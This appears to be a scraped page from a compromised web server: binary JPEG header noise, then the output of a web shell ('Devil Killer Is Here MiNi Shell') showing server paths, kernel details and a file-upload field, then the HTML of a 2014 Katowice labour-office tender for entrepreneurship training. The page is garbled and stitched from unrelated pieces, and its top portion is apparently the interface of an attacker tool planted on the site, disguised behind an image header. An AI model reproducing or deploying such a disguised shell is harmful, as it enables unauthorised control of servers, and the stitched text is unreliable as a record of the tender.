JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140313/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140313/85630-N-2014.html

<p class="kh_header"><b>Katowice: Zorganizowanie i przeprowadzenie szkolenia i doradztwa z zakresu przedsiębiorczości i prowadzenia własnej firmy w ramach projektu Restart kariery Poddziałanie 8.1.2 Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego</b><br>
<b>Numer ogłoszenia: 85630 - 2014; data zamieszczenia: 13.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Katowicach , ul. Pośpiecha 14, 40-852 Katowice, woj. śląskie, tel. 032 2598263, faks 032 2599503.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pup.katowice.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie szkolenia i doradztwa z zakresu przedsiębiorczości i prowadzenia własnej firmy w ramach projektu Restart kariery Poddziałanie 8.1.2 Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa polegająca na zorganizowaniu i przeprowadzeniu szkolenia i doradztwa z zakresu przedsiębiorczości i prowadzenia własnej firmy dla uczestników projektu Restart kariery Poddziałanie 8.1.2 Programu Operacyjnego Kapitał Ludzki współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, rekrutowanych przez Powiatowy Urząd Pracy w Katowicach.
Baza lokalowa (sale szkoleniowe oraz sale, w których odbywać się będzie doradztwo) powinny być zlokalizowane na terenie Katowic, w pobliżu węzłów komunikacji publicznej, tak by zapewnić uczestnikom dogodny dojazd. Zamawiający zastrzega sobie możliwość zmiany lokalizacji w przypadku zgłoszenia przez uczestników trudności komunikacyjnych.

2. Szkolenie obejmować powinno 40 godzin (1 godzina szkolenia liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę liczącą średnio 15 minut, gdyż długość przerw może być ustalana uczestnikami sposób elastyczny; przerwy powinny być planowane w taki sposób, aby nie powodowały skracania zajęć edukacyjnych). 

Ponadto każdy uczestnik powinien po zakończeniu szkolenia zostać objęty doradztwem indywidualnym w wymiarze 2 godzin (1 godzina to 60 minut). Celem doradztwa będzie przede wszystkim skonsultowanie założeń biznesplanu.

Szkolenie (wraz z przerwami) powinno odbywać się od poniedziałku do piątku w godz. 8.00-16.00. Termin realizacja szkolenia marzec/kwiecień 2014 r.

W trakcie szkolenia - nie później niż w ostatnim dniu zajęć - Wykonawca zobowiązany jest do ustalenia z uczestnikami szkoleń terminów doradztwa indywidualnego, sporządzenia imiennego harmonogramu, który podpisany jest przez osobę upoważnioną w imieniu Wykonawcy oraz uczestników powinien zostać przekazany do Zamawiającego w terminie 2 dni od dnia zakończenia szkolenia. Doradztwo indywidualne musi zakończyć się najpóźniej w terminie 10 dni kalendarzowych od dnia zakończenia szkolenia.

3. Program szkolenia powinien składać się z 2 części:
A) Część podstawowa - 20 godzin obejmująca następujące zagadnienia:
1. Biznesplan.
2. Procedura założenia firmy, w tym m.in.:
- warunki konieczne do założenia działalności gospodarczej;
- dokumenty niezbędne do założenia działalności gospodarczej.
3. Podstawowe aspekty dotyczące prowadzenia działalności gospodarczej, w tym m.in.:
- zasady prowadzenia działalności gospodarczej;
- prawa i obowiązki osoby prowadzącej działalność gospodarczą;
- akty prawne regulujące prowadzenia działalności gospodarczej;
- instytucje kontrolujące działalność gospodarczą.
4. Podstawowe aspekty dotyczące prowadzenia rachunkowości, w tym m.in.: 
- wybór formy opodatkowania;
- dokumentacja podatkowa;
- zasady prowadzenia ksiąg rachunkowych;
- zasady sprawozdawczości z prowadzenia działalności gospodarczej;
- zasady ustalania należności publiczno-prawnych.
5. Zatrudnianie pracowników 
6. Ubezpieczenia w działalności gospodarczej
7. Umowy w biznesie.

B) Część specjalistyczna - 20 godzin obejmująca następujące zagadnienia:
1. Marketing i promocja, w tym m.in.:
- skuteczne narzędzia promocji;
- efektywne kanały informacji o produkcie/usłudze;
- kreowanie wizerunku firmy;
- utrzymywanie długoterminowych relacji z klientami/kontrahentami.
2. Zarządzanie, w tym m.in.:
- zarządzanie środkami finansowymi;
- zarządzanie zasobami ludzkimi;
- zarządzanie wiedzą;
- benchmarking.

Szczegółowy program szkoleń zostanie przygotowany przez Wykonawcę i dołączony do oferty.

4. W szkoleniu weźmie udział 10 osób - uczestników projektu Restart kariery w zakresie wsparcia finansowego na rozwój przedsiębiorczości realizowanego w ramach Priorytetu VIII, Działania 8.1, Poddziałania 8.1.2 POKL. (1 grupa).

5. Zakres zamówienia obejmuje:
- minimum 40 godzin lekcyjnych szkolenia,
- minimum 20 godzin zegarowych doradztwa,
- koszt ubezpieczenia od następstw nieszczęśliwych wypadków powstałych w związku ze szkoleniem oraz w drodze na, do miejsca szkolenia i z powrotem
- zapewnienie materiałów szkoleniowych dla każdego uczestnika szkolenia, przy czym minimalny skład kompletu materiałów to: długopis, notes, skrypt na temat zakładania i prowadzenia działalności gospodarczej zawierającej wszystkie elementy programowe określone przez Zamawiającego,
- zaświadczenie ukończenia szkolenia,
- catering,
- koszt wynajmu sal, jeśli szkolenie odbywa się poza siedzibą ośrodka szkoleniowego.

Materiały szkoleniowe powinny być oznakowane zgodnie z aktualnym dokumentem Wytyczne dotyczące oznaczenia projektów ramach Programu Operacyjnego Kapitał Ludzki: Szkolenie zrealizowane w ramach projektu Restart kariery współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Poddziałanie 8.1.2 Programu Operacyjnego Kapitał Ludzki oraz logo Programu Operacyjnego Kapitał Ludzki i emblemat Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny,
- wydanie zaświadczeń imiennych potwierdzających udział w szkoleniu. Podstawą wydania zaświadczenia o ukończeniu szkolenia jest udział uczestnika w minimum 80% godzin zajęć przewidzianych programem i harmonogramem szkolenia. Zaświadczenia o ukończeniu szkolenia wydane przez jednostkę szkoleniową powinno być zgodne z Rozporządzeniem Ministra Pracy i Polityki Społecznej w sprawie standardów warunków prowadzenia usług rynku pracy. Ponadto wydane zaświadczenia powinny być oznakowane zgodnie z aktualnym dokumentem Wytyczne dotyczące oznaczenia projektów ramach Programu Operacyjnego Kapitał Ludzki tj. zawierające:
a) logo Programu Operacyjnego Kapitał Ludzki oraz emblemat Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny,
b) adnotację: Szkolenie zrealizowane w ramach projektu Restart kariery współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, Poddziałanie 8.1.2 Programu Operacyjnego Kapitał Ludzki oraz logo Programu Operacyjnego Kapitał Ludzki i emblemat Unii Europejskiej z podpisem Unia Europejska Europejski Fundusz Społeczny.

Catering dla wszystkich uczestników, który składać się będzie z poczęstunku w trakcie przerw kawowych oraz obiadu.
Na każdy dzień szkolenia przypadać będą 2 przerwy kawowe (po 15 min. każda) i 1 przerwa obiadowa (30 minut).
W czasie przerwy kawowej Wykonawca zobowiązany jest zapewnić:
- wyroby cukiernicze różnorodne: kruche ciasteczka, wafelki itp. (nie mniej niż 40 g na osobę z każdego rodzaju);
- napoje: kawa, herbata (bez ograniczeń), soki owocowe (po 0,33l/os), woda mineralna gazowana i niegazowana (po 0,33 l/os.),
- dodatki: cytryna, cukier, mleko.
Każdy obiad powinien składać się z: 
- zupy;
- dania głównego (mięsnego z dodatkiem ziemniaków, ryżu lub frytek i zestawu surówek w każdym dniu. Powinna istnieć, w uzasadnionych przypadkach, możliwość zamienienia dania mięsnego na bezmięsne);
- napojów różnorodnych: soki, woda mineralna gazowana i niegazowana itp.
Obiad powinien być podawany ok. godziny 13.00.

Sale szkoleniowe powinny spełniać następujące warunki:
a) mieścić liczbę miejsc odpowiadającą liczbie osób biorących udział w szkoleniu;
b) być wyposażone w sprzęt niezbędny do prowadzenia szkolenia, w tym: laptop, rzutnik multimedialny, ekran oraz tablice do notowania.
Wykonawca zobowiązany jest do oznakowania sali, w której będzie odbywało się szkolenie oraz doradztwo, zgodnie ze wzorem przekazanym przez zamawiającego w wersji elektronicznej w dniu podpisania umowy.

Wymagania odnośnie wykładowców (trenerów):
a) wykształcenie wyższe;
b) szeroki zakres wiedzy zarówno teoretycznej jak i praktycznej w zakresie przedsiębiorczości, odpowiednie kwalifikacje i umiejętności oraz potwierdzone doświadczenie w prowadzeniu co najmniej 5 szkoleń z zakresu uruchamiania i prowadzenia działalności gospodarczej oraz z zakresu tworzenia biznesplanu (łącznie).
Przedmiotowe szkolenia prowadzone powinny być przez wykładowców (trenerów) z wykorzystaniem przygotowanych wcześniej prezentacji multimedialnych oraz mieć jak najbardziej praktyczny charakter.
Doradztwo prowadzone powinno być w formie indywidualnych konsultacji pozwalających uczestnikom w szczególności na dopracowanie biznesplanu oraz na uzyskanie odpowiedzi na dodatkowe pytania i wątpliwości.
Wykładowca (trener) prowadzący grupę szkoleniową powinien być jednocześnie doradcą dla słuchaczy tej grupy.

6. Wykonawca w celu prawidłowej realizacji przedmiotu zamówienia powinien zapewnić:
- przeprowadzenie szkolenia zgodnie z harmonogramem szkolenia, uwzględniającym wskazane przez Zamawiającego zagadnienia;
- sprawdzanie obecności na zajęciach (listy obecności z każdego dnia wraz z własnoręcznymi podpisami uczestników);
- sprawdzania poziomu wiedzy - przeprowadzenie ankiety sprawdzającej zmianę poziomu wiedzy w formie pretestu  na początku trwania szkolenia oraz posttestu po zakończonym szkoleniu. Ankiety (pretest i posttest) powinny być opracowane przez Wykonawcę i przekazane do akceptacji Zamawiającemu w dniu zawarcia umowy;
- Wykonawca jest zobowiązany w dniu zawarcia umowy przekazać Zamawiającemu adresy sal, w których odbywać się będą szkolenia oraz doradztwo;
- osoba prowadząca zarówno szkolenie jak i doradztwo zobowiązana jest do prowadzenia dokumentacji w postaci:
a) Potwierdzenie wykonania usługi doradczo-szkoleniowej - zał. nr 10 do WYTYCZNYCH INSTYTUCJI POŚREDNICZĄCEJ W SPRAWIE UDZIELANIA POMOCY NA ROZWÓJ PRZEDSIĘBIORCZOŚCI W RAMACH DZIAŁANIA 6.2 - WSPARCIE ORAZ PROMOCJA PRZEDSIĘBIORCZOŚCI I SAMOZATRUDNIENIA ORAZ PODDZIAŁANIA 8.1.2 - WSPARCIE PROCESÓW ADAPTACYJNYCH I MODERNIZACYJNYCH W REGIONIE PROGRAMU OPERACYJNEGO KAPITAŁ LUDZKI W WOJEWÓDZTWIE ŚLĄSKIM.
b) List obecności.
c) Dziennika zajęć.
7. Dodatkowe informacje:
- Wykonawca zobowiązany jest do przetwarzania danych osobowych uczestników projektu zgodnie z ustawą o ochronie danych osobowych z dnia 29.08.1997 r. (tj. Dz. U. z 2002 r., Nr 101, poz. 926 z późn. Zm.);
- Wykonawca będzie upoważniony do przetwarzania danych osobowych uczestników szkolenia i doradztwa;
- zapłata za zrealizowane zamówienie dokonana będzie po przeprowadzeniu całej usługi, przelewem na rachunek podany przez Wykonawcę w terminie 30 dni od daty otrzymania faktury;
- Zamawiający przekaże Wykonawcy w dniu zawarcia umowy, w formie elektronicznej (e-mail), wzory:
a) list obecności wraz z potwierdzeniem odbioru cateringu;
b) potwierdzeń odbioru materiałów szkoleniowych;
c) potwierdzeń zaświadczeń ukończeniu szkolenia;
- każdy uczestnik szkolenia potwierdza własnoręcznym podpisem obecność na szkoleniu i doradztwie oraz wszystkie elementy usługi szkoleniowej: catering, odbiór materiałów szkoleniowych, odbiór zaświadczenia o ukończeniu szkolenia.
- podstawą zapłaty będzie przekazanie faktury wraz z:
a) listami potwierdzającymi (własnoręcznym podpisem uczestników) odbiór wydanych zaświadczeń ukończeniu szkolenia;
b) listami obecności;
c) potwierdzeniem wykonania usługi doradczo-szkoleniowej; 
d) kopiami zaświadczeń o ukończeniu szkolenia;
e) wypełnionymi przez uczestników szkolenia ankietami (pretest, posttest);
f) protokołem zdawczo-odbiorczym podpisanym przez Zamawiającego i Wykonawcę.
- wszystkie dokumenty, które Wykonawca zobowiązany jest przedstawić Zamawiającemu powinny być w formie oryginału (nie dotyczy zaświadczeń ukończeniu szkolenia);
- Zamawiający zastrzega sobie prawo dokonywania kontroli w trakcie prowadzonego szkolenia i doradztwa;
- Szkolenie jest finansowane w całości ze środków publicznych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>przewiduje się udzielenie zaliczek na poczet wykonania zamówienia</b></li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi posiadać aktualny wpis do Rejestru Instytucji 				Szkoleniowych Wojewódzkiego Urzędu Pracy.
W celu wykazania spełniania przez Wykonawcę warunku, o którym mowa powyżej  Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a. oświadczenie, że Wykonawca posiada aktualne zaświadczenie o wpisie	instytucji szkoleniowej do Rejestru Instytucji Szkoleniowej Wojewódzkiego Urzędu Pracy - zgodnie z załącznikiem nr 3 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, iż w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał lub wykonuje co najmniej 3 usługi polegające na przeprowadzeniu szkolenia w zakresie uruchamiania i prowadzenia indywidualnej działalności gospodarczej oraz z zakresu tworzenia biznes planu (łącznie).
W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej  Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a.  wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych 		również wykonywanych, usług w zakresie niezbędnym do wykazania 		spełniania warunku wiedzy i doświadczenia w okresie ostatnich 3 lat przed 		upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest 		krótszy - w tym okresie, z podaniem ich przedmiotu, dat wykonania i 			podmiotów na rzecz których usługi zostały wykonane - zgodnie z 			załącznikiem nr 5 do SIWZ, oraz załączeniem dowodów czy zostały 			wykonane lub są wykonywane należycie.
Uwaga: wystarczające będzie wskazanie w wykazie oraz załączenie dowodów dotyczących usług w liczbie i w zakresie niezbędnym do wykazania spełniania wyżej opisanego warunku wiedzy i doświadczenia.

Dowodami, o których mowa powyżej są:
1) poświadczenie, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż na 3 miesiące przed upływem terminu składania ofert;
2) oświadczenie wykonawcy - jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym wyżej mowa.

Uwaga: Dopuszcza się, aby Wykonawca w miejsce poświadczeń i oświadczeń, o których mowa powyżej przedłożył dokumenty potwierdzające, że usługi zostały wykonane lub są wykonywane należycie (np. referencje), zgodnie z Rozporządzeniem Prezesa Rady Ministrów z 19.02.2013 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy, oraz form w jakich te dokumenty mogą być składane (Dz. U. poz. 231).

Uwaga: W przypadku, gdy Zamawiający - Powiatowy Urząd Pracy w Katowicach jest podmiotem, na rzecz którego usługi wskazane w załączniku nr 5 do SIWZ zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać dysponowanie min. 1 osobą zdolną do wykonania zamówienia, posiadającą odpowiednie kwalifikacje i umiejętności oraz potwierdzone doświadczenie w prowadzeniu co najmniej 3 szkoleń z zakresu uruchamiania i prowadzenia działalności gospodarczej oraz z zakresu tworzenia biznesplanu (łącznie), w okresie ostatnich 3 lat.
W celu oceny spełniania przez Wykonawcę warunku, o którym mowa powyżej. Wykonawca zobowiązany jest przedłożyć wraz z ofertą:
a. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia 			(wystarczające będzie wykazanie wyłącznie osób, o których mowa powyżej 		w pkt 2.3.1), wraz z informacjami na temat ich kwalifikacji 					zawodowych/uprawnień niezbędnych do wykonania zamówienia, a także 		zakresu wykonywanych przez nie czynności, oraz informacją o podstawie 		dysponowania tymi osobami - zgodnie z załącznikiem nr 6 do SIWZ;
Zamawiający na etapie realizacji zamówienia dopuszcza możliwość zmiany osób wykonujących przedmiot zamówienia pod warunkiem:
- powiadomienia Zamawiającego o zamiarze zmiany
- podania powodów zmiany
- zaproponowania osób, których kwalifikacje zawodowe/uprawnienia będą zgodne z SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Nie dotyczy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz ofertowy wraz z oświadczeniem wykonawcy, że zapoznał się z warunkami zamówienia i z załączonym wzorem umowy oraz, że przyjmuje ich treść bez żadnych zastrzeżeń - zgodnie z załącznikiem nr 1 do SIWZ.
2. Lista podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt. 5 ustawy albo informację o tym, że Wykonawca nie należy do grupy kapitałowej - zgodnie z załącznikiem nr 4 do SIWZ.
3. Pełnomocnictwo ustanowione do reprezentowania wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego. Pełnomocnictwo należy dołączyć w oryginale bądź kopii, potwierdzonej za zgodność z oryginałem notarialnie.
4. Program seminarium, który powinien zawierać:
- nazwę i zakres szkolenia,
- czas trwania (z uwzględnieniem podziału szkolenia i doradztwa) i sposób organizacji,
- plan szkolenia określający temat zajęć oraz ich wymiar,
- miejsce odbycia szkolenia i doradztwa.
5. Kalkulację kosztów - załącznik nr 7,
6. Harmonogram szkolenia - załącznik nr 8,
7. Certyfikat jakości usług, (jeżeli Wykonawca posiada). Certyfikat jakości usług może dotyczyć zarówno kierunku szkolenia, na które Wykonawca złoży ofertę, jak również Wykonawcy, jako instytucji szkoleniowej świadczącej usługi szkoleniowe. Wśród certyfikatów przedstawianych mogą się znaleźć np: certyfikat zarządzania jakością kształcenia/szkolenia, wydany na podstawie międzynarodowych norm ISO, standard HACCP, certyfikat dla szkół językowych PASE lub inny znak jakości, akredytacje Kuratora Oświaty itd.
8. Wzór zaświadczenia i/lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji zawierający co najmniej:
- imię i nazwisko oraz numer PESEL uczestnika szkolenia
- nazwę instytucji szkoleniowej przeprowadzającej szkolenie,
- formę i nazwę szkolenia,
- okres trwania szkolenia,
- miejsce i datę wydania zaświadczenia i/lub innego dokumentu potwierdzającego ukończenie szkolenia i uzyskanie kwalifikacji
- tematy i wymiar godzin zajęć edukacyjnych,
- podpis osoby upoważnionej przez instytucję szkoleniową przeprowadzającą szkolenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 50</li>
<li>2 - Doświadczenie zawodowe wykładowców - 25</li>
